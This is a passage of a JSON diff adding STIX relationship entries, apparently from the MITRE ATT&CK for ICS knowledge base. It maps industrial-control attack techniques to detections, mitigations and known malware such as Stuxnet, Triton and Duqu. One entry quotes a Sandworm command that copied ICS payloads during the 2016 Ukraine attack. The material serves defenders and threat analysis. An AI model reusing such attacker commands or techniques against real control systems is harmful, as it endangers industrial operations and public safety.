"relationship--ceafc04b-b31f-419b-82da-41ce9e1ec6e9", + "created": "2022-09-23T16:36:40.950Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T15:50:45.583Z", + "description": "Engineering and asset management software will often maintain a copy of the expected program loaded on a controller and may also record any changes made to controller programs and tasks. Data from these platforms can be used to identify modified controller tasking.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--8ed4e6d0-56d7-4e6b-8fa6-41f41631f30d", + "target_ref": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a86cee0a-dc49-4c95-b5dc-37405337490b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.079Z", + "relationship_type": "mitigates", + "description": "Authenticate all access to field controllers before authorizing access to, or modification of, a device's state, logic, or programs. Centralized authentication techniques can help manage the large number of field controller accounts needed across the ICS.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--98b229f8-6020-4fbb-b104-54fd478c14d9", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:29:49.652Z", + "description": "Monitor logon sessions for default credential use.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5", + "target_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--26e58427-a2bd-4e77-9939-16ef60a072e7", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:49:04.746Z", + "description": "Authenticate connections fromsoftware and devices to prevent unauthorized systems from accessing protected management functions.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--07c0e166-f05e-413f-8f3e-f487317c9626", + "created": "2023-03-22T15:53:59.953Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-22T15:53:59.953Z", + "description": "Devices and programs that receive command messages from remote systems (e.g., control servers) should verify those commands before taking any actions on them.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1cbcceef-3233-4062-aa86-ec91afe39517", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f862418a-e7b4-4783-8949-7145f3dee665", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.104Z", + "relationship_type": "mitigates", + "description": "Authenticate connections from software and devices to prevent unauthorized systems from accessing protected management functions.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--26254163-4f25-4d30-8456-ca093459ff32", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:32:29.856Z", + "description": "Monitor for newly executed processes that execute from removable media after it is mounted or when initiated by a user. If a remote access tool is used in this manner to move laterally, then additional actions are likely to occur after execution, such as opening network connections for Command and Control and system and network information Discovery. ", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a28ecd81-a7dd-404c-9d7b-ce670b0fc83b", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:50:54.867Z", + "description": "On Windows and Unix systems monitor executed commands and arguments that may use shell commands for execution. Shells may be common on administrator, developer, or power user systems depending on job function.\n\nOn network device and embedded system CLIs consider reviewing command history if unauthorized or suspicious commands were used to modify device configuration.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--33215dfa-53d0-4bd7-a15d-cec9315c7c4d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.130Z", + "relationship_type": "mitigates", + "description": "Deny direct remote access to internal systems through the use of network proxies, gateways, and firewalls. Steps should be taken to periodically inventory internet accessible devices to determine if it differs from the expected.\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--692324b4-064a-430c-8ffc-7f7acd537778", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Symantec", + "description": "Symantec W32.Duqu The precursor to the next Stuxnet Retrieved. 2019/11/03 ", + "url": "https://docs.broadcom.com/doc/w32-duqu-11-en" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:10:47.409Z", + "description": "[Duqu](https://attack.mitre.org/software/S0038) downloads additional modules for the collection of data in information repositories, including the Infostealer 2 module that can access data from Windows Shares.(Citation: Symantec)", + "relationship_type": "uses", + "source_ref": "malware--68dca94f-c11d-421e-9287-7c501108e18c", + "target_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5901e8b3-7df0-43e0-bdc5-f4fd2792a572", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:17:25.451Z", + "description": "Monitor for newly executed processes related to services specifically designed to accept remote connections, such as RDP, Telnet, SSH, and VNC. The adversary may use [Valid Accounts](https://attack.mitre.org/techniques/T0859) to login and may perform follow-on actions that spawn additional processes as the user.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b182692b-5eb3-4edc-b455-1f92d64b98ec", + "created": "2022-09-26T15:38:45.913Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:38:45.913Z", + "description": "Monitor for loss of expected device alarms which could indicate alarms are being suppressed. As noted in the technique description, there may be multiple sources of alarms in an ICS environment. Discrepancies between alarms may indicate the adversary is suppressing some but not all the alarms in the environment. This will not directly detect the technique’s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2057ec71-a94f-49cc-b348-2eeb44899afd", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T18:40:20.312Z", + "description": "Monitor for changes made to a large quantity of files for unexpected modifications in both user directories and directories used to store programs and OS components (e.g., C:\\Windows\\System32). ", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8", + "target_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--104b4f25-d0a9-41f6-94b3-fa85ee8b1523", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.229Z", + "relationship_type": "mitigates", + "description": "Authenticate all access to field controllers before authorizing access to, or modification of, a device's state, logic, or programs. Centralized authentication techniques can help manage the large number of field controller accounts needed across the ICS.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--a618d7e4-23f0-4b8c-9f09-78d04ea7fc55", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:14:57.034Z", + "description": "Monitor for alarm setting changes observable in automation or management network protocols.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--49966e16-04a2-4fd7-86cd-aa934040a9d8", + "created": "2023-03-31T17:44:19.711Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-07T19:50:55.445Z", + "description": "During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used a VBS script to facilitate lateral tool transfer. The VBS script was used to copy ICS-specific payloads with the following command: `cscript C:\\Backinfo\\ufn.vbs C:\\Backinfo\\101.dll C:\\Delta\\101.dll`(Citation: Dragos Crashoverride 2018)", + "relationship_type": "uses", + "source_ref": "campaign--aa73efef-1418-4dbe-b43c-87a498e97234", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1c12b1d6-d636-45c6-98f4-947ddb502cb0", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:11:33.323Z", + "description": "Monitor for lack of operational process data which may help identify a loss of communications. This will not directly detect the technique’s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "target_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--03ad6a9a-4443-4e33-a7a5-933e22f2e022", + "created": "2022-09-27T17:39:15.655Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:56:24.399Z", + "description": "Monitor for unexpected network share access, such as files transferred between shares within a network using protocols such as Server Message Block (SMB).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6e3c2c04-0838-4863-80a7-d73ef5ac6a64", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.220Z", + "relationship_type": "mitigates", + "description": "Protocols used for control functions should provide authenticity through MAC functions or digital signatures. If not, utilize bump-in-the-wire devices or VPNs to enforce communication authenticity between devices that are not capable of supporting this (e.g., legacy controllers, RTUs).\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--c4e8dd42-9855-4a36-b915-dc7e1a91e235", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Robert Falcone, Bryan Lee May 2016", + "description": "Robert Falcone, Bryan Lee 2016, May 26 The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor Retrieved. 2019/11/19 ", + "url": "https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:32:03.970Z", + "description": "[OilRig](https://attack.mitre.org/groups/G0049) has embedded a macro within spearphishing attachments that has been made up of both a VBScript and a PowerShell script.(Citation: Robert Falcone, Bryan Lee May 2016)", + "relationship_type": "uses", + "source_ref": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2e5f338d-92c4-4647-8fef-7c901ff774f5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.220Z", + "relationship_type": "mitigates", + "description": "Protect files stored locally with proper permissions to limit opportunities for adversaries to interact and collect information from databases. (Citation: Keith Stouffer May 2015) (Citation: National Institute of Standards and Technology April 2013)\n", + "source_ref": "course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971", + "target_ref": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--cf703ecc-e9f5-4d56-94d4-8fda9837e614", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-28T18:44:20.611Z", + "description": "Monitor for unexpected ICS protocol functions from new and existing devices. Monitoring known devices requires ICS function level insight to determine if an unauthorized device is issuing commands (e.g., a historian).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--655e2f91-5d43-4c47-b7e0-8248b351f3ba", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:49:07.316Z", + "description": "Monitor device alarms that indicate the devices has been placed into Firmware Update Mode, although not all devices produce such alarms.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--028a3bcc-f299-4061-a0f2-8da85e0a3c81", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.177Z", + "relationship_type": "mitigates", + "description": "Authenticate connections from software and devices to prevent unauthorized systems from accessing protected management functions.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f0ac1d07-fccd-4330-93cf-fbc985ee6fb9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.160Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--fa1bde35-63d9-4c5c-969b-2c17c29089fa", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:28:50.588Z", + "description": "All field controllers should require users to authenticate for all remote or local management sessions. The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7aa93b40-80da-4bb6-8a7c-88e5f5e44669", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.157Z", + "relationship_type": "mitigates", + "description": "Protocols used for device management should authenticate all network messages to prevent unauthorized system changes.\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--8b2d82aa-75fc-4d6d-bb4b-9f600bd211fd", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "MDudek-ICS", + "description": "MDudek-ICS TRISIS-TRITON-HATMAN Retrieved. 2019/11/03 ", + "url": "https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN/tree/master/decompiled_code/library" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:27:15.545Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) uses TriStations default UDP port, 1502, to communicate with devices. (Citation: MDudek-ICS)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bcece7ce-91b5-40b3-b87a-25cab3600e5c", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:16:10.677Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) attempts to contact command and control servers on port 80 to send basic information about the computer it has compromised. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--228b9a13-0545-4ecf-99ff-be02addaf7fe", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ESET", + "description": "ESET ACAD/Medre.A: 10000s of AutoCAD Designs Leaked in Suspected Industrial Espionage Retrieved. 2021/04/13 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/200x/white-papers/ESET_ACAD_Medre_A_whitepaper.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:10:58.645Z", + "description": 